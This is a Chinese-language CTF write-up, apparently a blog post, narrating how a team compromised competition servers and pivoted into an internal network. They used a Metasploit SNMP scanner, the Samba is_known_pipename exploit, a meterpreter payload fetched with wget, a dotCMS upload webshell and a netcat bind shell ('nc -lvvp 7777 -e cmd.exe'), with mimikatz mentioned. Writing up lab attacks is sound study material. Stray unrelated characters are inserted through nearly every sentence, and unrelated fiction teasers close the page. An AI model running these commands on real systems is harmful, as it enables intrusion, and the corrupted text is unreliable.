信息安全鐵人三項賽之企業(yè)賽 Writeup

Writeup by:SourceCode

首先,先介紹一下企業(yè)賽的環(huán)境楼咳,主辦方給了一套環(huán)境熄捍,作為一道題。也就是說母怜,要模擬入侵一個企業(yè)余耽。首先,有兩臺機器鏈接外網(wǎng)苹熏。在這里我分別稱為A和B碟贾。然后需要通過AB作為跳板機币喧,進而深入內(nèi)網(wǎng)。

p.s.本文由豆豆袱耽,Skay杀餐,5am3各自負責部分分別整理而成,邏輯方面可能會有些跳朱巨。

0x01 A前臺分析

打開第一個入口點史翘,發(fā)現(xiàn)是一個網(wǎng)站,彈出窗口冀续,未選擇file琼讽,于是猜測有文件包含漏洞,繼續(xù)查看洪唐,發(fā)現(xiàn)源碼中有Tips.php跨琳。嘗試用偽協(xié)議讀取源碼。

mark

然后獲取到一個hint桐罕。

mark

0x02 A繼續(xù)深入

找到這個Hint時,我發(fā)現(xiàn)這個是snmp的一個漏洞桂敛,使用 參考網(wǎng)站 功炮,我們首先先爆破出SNMP字符串,這里我們使用 Metasploit 這個工具术唬,執(zhí)行命令

msf> use auxiliary/scanner/snmp/snmp_login

查看一下 options薪伏,我們可以只修改 RHOST 指向靶機的 IP地址,執(zhí)行run命令

mark

如圖所示粗仓,admin就是SNMP的字符串嫁怀,之后我們就可以開始大膽的想法了。

mark
mark

看到這么多的好東西借浊,Windows的用戶名拿到了塘淑,端口3389,隨便嘗試用戶名蚂斤,發(fā)現(xiàn) Guest和SUPPORT的被停用存捺,猜測弱密碼,之后在嘗試之后使用 libai 登陸成功(這算不算是硬廣告曙蒸?)捌治,進入服務器

mark

(其實桌面上只有phpstudy和回收站,后來當跳板用了)纽窟,搜索好啦

mark

輕松拿到兩個flag文件肖油,還有一個是Mysql數(shù)據(jù)庫的,打開數(shù)據(jù)庫管理工具臂港,拿到flag

mark

此時A已成功淪陷森枪。

0x03 B初試

首先訪問80端口视搏,沒用.....

掃描服務器,發(fā)現(xiàn)如下端口對外開放

mark

445端口疲恢,又知道這是一個Linux服務器凶朗,嗯~猜測“永恒之藍”Linux版本應該可以攻擊,使用

mark

攻擊成功显拳,查找flag文件棚愤,發(fā)現(xiàn)

mark

查看一下文件,拿到 flag

0x04 內(nèi)網(wǎng)初探

在豆豆同學發(fā)現(xiàn)了202.1.1.60 的445漏洞后杂数,也就是exploit/samba/is_known_pipename這個漏洞利用模塊宛畦,馬上用自己的msf進去拿了shell

mark

接著進一步進入內(nèi)網(wǎng),不過目前拿到的session不支持msf的路由策略揍移,我也不曉得是為什么次和,,那伐,踏施,桑心,只能上傳meterpreter的shell了罕邀,先在本地生成木馬畅形,感謝主辦方,沒有任何防護诉探,嘻嘻日熬,然后自己在我本地搭了一個web服務,在目標機器上wget獲得我本地的payload肾胯,然后在msf上監(jiān)聽獲得反彈shell

mark
mark
mark

然后我們開心的添加路由啦~~

mark

設置socks4代理

mark

然后用msf自帶的掃描腳本開始掃描內(nèi)網(wǎng)端口竖席,,敬肚,毕荐,不過,艳馒,出奇的慢东跪,,鹰溜,虽填,要死了,曹动,斋日,

mark

我們換nmap 設置proxychains代理

mark

這時豆豆同學已經(jīng)拿下windows serve2003的遠程桌面了,而且發(fā)現(xiàn)也在內(nèi)網(wǎng)當中 嘻嘻嘻 開心墓陈,先用批處理命令ping一下整個網(wǎng)段恶守,看看有多少ip是開著的第献,本來代理就慢,不想掃那么多兔港,結果發(fā)現(xiàn) 內(nèi)網(wǎng)網(wǎng)段是 192.168.1.1 .2 .33 .34 .35 .36開著庸毫,開心的繼續(xù)用nmap掃,掃到36開著8080衫樊,發(fā)現(xiàn)是一個cms飒赃,交給諾熙處理,繼續(xù)掃科侈,载佳,,臀栈,發(fā)現(xiàn)2上開著80蔫慧,找不出什么東西,权薯,姑躲,35,盟蚣,也沒出來啥黍析,,刁俭,

到了后面,豆豆的mac一直用不了代理韧涨,隊長也反映socks4 總斷牍戚,,好桑心虑粥,如孝,

不過還好拿到了win2003的遠程桌面,直接上個圖形界面的全代理娩贷,嘻嘻第晰,上CCProxy,啥代理都有彬祖,開心~

0x05 內(nèi)網(wǎng)深入

原諒我茁瘦,沒有QQ截圖有點費勁,然后......

36服務器上跑著一個dotcms储笑。
首先甜熔,大概看一下這個網(wǎng)站。

發(fā)現(xiàn)一個flag明顯的放在前臺某個頁面突倍。腔稀。就內(nèi)個放文檔的頁面盆昙。(好吧,沒圖說個jb...怪我)

然后....登錄頁面處焊虏,賬號密碼完整填充淡喜。

感謝主辦方!感謝主辦方诵闭!感謝主辦方A锻拧(重要的事情說三遍)

此時有個小坑,它分為普通用戶登錄和管理員登錄涂圆,是在不同的頁面们镜。

然后直接搜,看看有沒有能用的漏洞润歉。
搜到的大多數(shù)是一些sql注入模狭。然而,這種比賽踩衩,你覺得sql注入有用嗎嚼鹉?
好吧,繼續(xù)搜驱富。最后發(fā)現(xiàn)了一個后臺上傳漏洞锚赤。

http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201707-887

然后拿到cookie,burp掛上代理褐鸥,直接打流量上傳shell即可线脚。
此時因為是jsp頁面,推薦c刀叫榕。

然后成功拿到shell..

0x06 再深入

然而浑侥,雖說shell有了,但是再得知這是個windows服務器后晰绎,頓時涼了半截寓落。
拿到shell完全沒多大用啊。而且尤其是c刀的shell荞下,很難用有沒有伶选,差點氣死我。
先說正事尖昏,發(fā)現(xiàn)兩個flag仰税,一個是剛剛說的前臺那個,還有一個在C盤根目錄下抽诉。

緊接著肖卧,懷疑還有其他flag。當然掸鹅,也為著那一點點尊嚴塞帐。一定要拿到遠程桌面拦赠。

首先,先換個shell唄葵姥,這個太難用了荷鼠。
于是上傳nc。

nc -lvvp 7777 -e c:\Windows\system32\cmd.exe

然后直接連接過去榔幸。

nc ip 7777

說實話允乐,這個shell比c刀的好1000000000倍.....

之前在c刀嘗試mimikatz查密碼。然而回顯有問題削咆。
之前在c刀嘗試tasklist /svc查服務牍疏。然而回顯有問題。
之前在c刀嘗試netstat -ano查端口占用拨齐。然而回顯有問題鳞陨。

此時,有了這個新的shell瞻惋,這一切都不是問題厦滤,此時開心的笑了。

然而....
mimikatz查密碼歼狼,查不到掏导。
tasklist查服務,沒找到TermService羽峰。
netstat查端口趟咆,看見一堆亂七八糟的。

最終閑的蛋疼梅屉,挨個試了試端口值纱。然而也沒找到3389到底去了哪里。
貌似真的沒開....

然而開3389又不會履植。所以這題涼了.....

最后计雌,這次比賽吃的好飽悄晃!

路還長玫霎,SourceCode的第一個冠軍,一起加油妈橄!

最后編輯于
?著作權歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末庶近,一起剝皮案震驚了整個濱河市,隨后出現(xiàn)的幾起案子眷蚓,更是在濱河造成了極大的恐慌鼻种,老刑警劉巖,帶你破解...
    沈念sama閱讀 207,113評論 6 481
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件沙热,死亡現(xiàn)場離奇詭異叉钥,居然都是意外死亡罢缸,警方通過查閱死者的電腦和手機,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 88,644評論 2 381
  • 文/潘曉璐 我一進店門投队,熙熙樓的掌柜王于貴愁眉苦臉地迎上來枫疆,“玉大人,你說我怎么就攤上這事敷鸦∠⑿ǎ” “怎么了?”我有些...
    開封第一講書人閱讀 153,340評論 0 344
  • 文/不壞的土叔 我叫張陵扒披,是天一觀的道長值依。 經(jīng)常有香客問我,道長碟案,這世上最難降的妖魔是什么愿险? 我笑而不...
    開封第一講書人閱讀 55,449評論 1 279
  • 正文 為了忘掉前任,我火速辦了婚禮蟆淀,結果婚禮上拯啦,老公的妹妹穿的比我還像新娘。我一直安慰自己熔任,他們只是感情好褒链,可當我...
    茶點故事閱讀 64,445評論 5 374
  • 文/花漫 我一把揭開白布。 她就那樣靜靜地躺著疑苔,像睡著了一般甫匹。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發(fā)上惦费,一...
    開封第一講書人閱讀 49,166評論 1 284
  • 那天兵迅,我揣著相機與錄音,去河邊找鬼薪贫。 笑死恍箭,一個胖子當著我的面吹牛,可吹牛的內(nèi)容都是我干的瞧省。 我是一名探鬼主播扯夭,決...
    沈念sama閱讀 38,442評論 3 401
  • 文/蒼蘭香墨 我猛地睜開眼,長吁一口氣:“原來是場噩夢啊……” “哼鞍匾!你這毒婦竟也來了交洗?” 一聲冷哼從身側(cè)響起,我...
    開封第一講書人閱讀 37,105評論 0 261
  • 序言:老撾萬榮一對情侶失蹤橡淑,失蹤者是張志新(化名)和其女友劉穎构拳,沒想到半個月后,有當?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體,經(jīng)...
    沈念sama閱讀 43,601評論 1 300
  • 正文 獨居荒郊野嶺守林人離奇死亡置森,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 36,066評論 2 325
  • 正文 我和宋清朗相戀三年斗埂,在試婚紗的時候發(fā)現(xiàn)自己被綠了。 大學時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片凫海。...
    茶點故事閱讀 38,161評論 1 334
  • 序言:一個原本活蹦亂跳的男人離奇死亡蜜笤,死狀恐怖,靈堂內(nèi)的尸體忽然破棺而出盐碱,到底是詐尸還是另有隱情把兔,我是刑警寧澤,帶...
    沈念sama閱讀 33,792評論 4 323
  • 正文 年R本政府宣布瓮顽,位于F島的核電站县好,受9級特大地震影響,放射性物質(zhì)發(fā)生泄漏暖混。R本人自食惡果不足惜缕贡,卻給世界環(huán)境...
    茶點故事閱讀 39,351評論 3 307
  • 文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望拣播。 院中可真熱鬧晾咪,春花似錦、人聲如沸贮配。這莊子的主人今日做“春日...
    開封第一講書人閱讀 30,352評論 0 19
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽泪勒。三九已至昼蛀,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間圆存,已是汗流浹背叼旋。 一陣腳步聲響...
    開封第一講書人閱讀 31,584評論 1 261
  • 我被黑心中介騙來泰國打工, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留沦辙,地道東北人夫植。 一個月前我還...
    沈念sama閱讀 45,618評論 2 355
  • 正文 我出身青樓,卻偏偏與公主長得像油讯,于是被迫代替她去往敵國和親详民。 傳聞我的和親對象是個殘疾皇子,可洞房花燭夜當晚...
    茶點故事閱讀 42,916評論 2 344

推薦閱讀更多精彩內(nèi)容